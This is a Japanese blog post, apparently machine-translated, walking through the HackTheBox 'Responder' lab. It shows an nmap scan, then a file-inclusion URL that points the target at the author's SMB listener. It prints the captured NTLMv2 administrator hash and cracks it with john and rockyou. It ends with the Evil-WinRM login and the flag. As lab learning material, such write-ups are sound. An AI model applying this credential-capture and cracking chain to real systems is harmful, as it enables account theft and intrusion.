banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github
ホームアーカイブ[Code]Rust[区块链]Blockchain[引擎]Rust-Bevy[安全]Web2Security

[記模擬浸透]-HackTheBoX-Tier1_Responder - 4

#Web2Security#HackTheBox244
AI 翻訳
この記事はAIを通じて英語から日本語に翻訳されました。原文を表示
AI が生成した要約
nmap -v -A -p1-65535 image.png IP address input, redirected to domain image.pngunika.htb Discovered redirection, added IP and address 10.129.242.179 unika.htbimage.png in etc/hosts Accessed image.png again http://unika.htb/index.php?page=//openvpn/somefile Responder obtained hash Accessed image.png again http://unika.htb/index.php?page=//openvpn/somefile Responder obtained hash [SMB] NTLMv2-SSP Client: ::ffff:10.129.242.179 [SMB] NTLMv2-SSP Username: RESPONDER\Administrator [SMB] NTLMv2-SSP Hash: Administrator::RESPONDER:670a9ba6d2d4003d:1F8CF2050B31A2B3CD345CC04A6B403F:010100000000000000E161B09583D801F933966B23CD585000000000020008004B00560031004B0001001E00570049004E002D004900340053003900320049005A004300380048005400040034570049004E002D004900340053003900320049005A0043003800480054002E004B00560031004B002E004C004F00430041004C00030014004B00560031004B002E004C004F00430041004C00050014004B00560031004B002E004C004F00430041004C000700080000E161B09583D8010600040002000000080030003000000000000000010000000020000076AEB5FC3A14CEDDAF3875BA92BAD2FFE8CA3

nmap -v -A -p1-65535

image.png

IP アドレスを入力してアクセスし、このドメインにリダイレクトされます
image.png
unika.htb

リダイレクトされたことがわかりました。etc/hosts に IP とアドレスを追加します
10.129.242.179 unika.htb
image.png

追加した後、再度アクセスします
image.png

http://unika.htb/index.php?page=//openvpn 取得したアドレス /somefile

image.png

responder がハッシュを取得しました
[+] イベントをリッスン中...

[SMB] NTLMv2-SSP クライアント : ::ffff:10.129.242.179
[SMB] NTLMv2-SSP ユーザー名 : RESPONDER\Administrator
[SMB] NTLMv2-SSP ハッシュ : Administrator::RESPONDER:670a9ba6d2d4003d:1F8CF2050B31A2B3CD345CC04A6B403F:010100000000000000E161B09583D801F933966B23CD585000000000020008004B00560031004B0001001E00570049004E002D004900340053003900320049005A00430038004800540004003400570049004E002D004900340053003900320049005A0043003800480054002E004B00560031004B002E004C004F00430041004C00030014004B00560031004B002E004C004F00430041004C00050014004B00560031004B002E004C004F00430041004C000700080000E161B09583D8010600040002000000080030003000000000000000010000000020000076AEB5FC3A14CEDDAF3875BA92BAD2FFE8CA3BE1647E63F269BA7CE6327456740A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00370037000000000000000000
image.png

image.png

ローカルに保存し、john でクラックします
image.png

┌──(kali ㉿ kali)-[~]
└─$ john hash1.txt -w=/usr/share/wordlists/rockyou.txt
デフォルトの入力エンコーディングを使用: UTF-8
1 つのパスワードハッシュを読み込みました (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
4 つの OpenMP スレッドを実行します
'q' または Ctrl-C を押して中止、ほぼ他の任意のキーでステータスを表示
badminton (Administrator)
1g 0:00:00:00 完了 (2022-06-19 08:06) 50.00g/s 204800p/s 204800c/s 204800C/s slimshady..oooooo
すべてのクラックされたパスワードを確実に表示するには、"--show --format=netntlmv2" オプションを使用してください
セッションが完了しました。

image.png

image.png

Evil-WinRM PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
Evil-WinRM PS C:\Users\mike\Desktop>

image.png

image.png

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。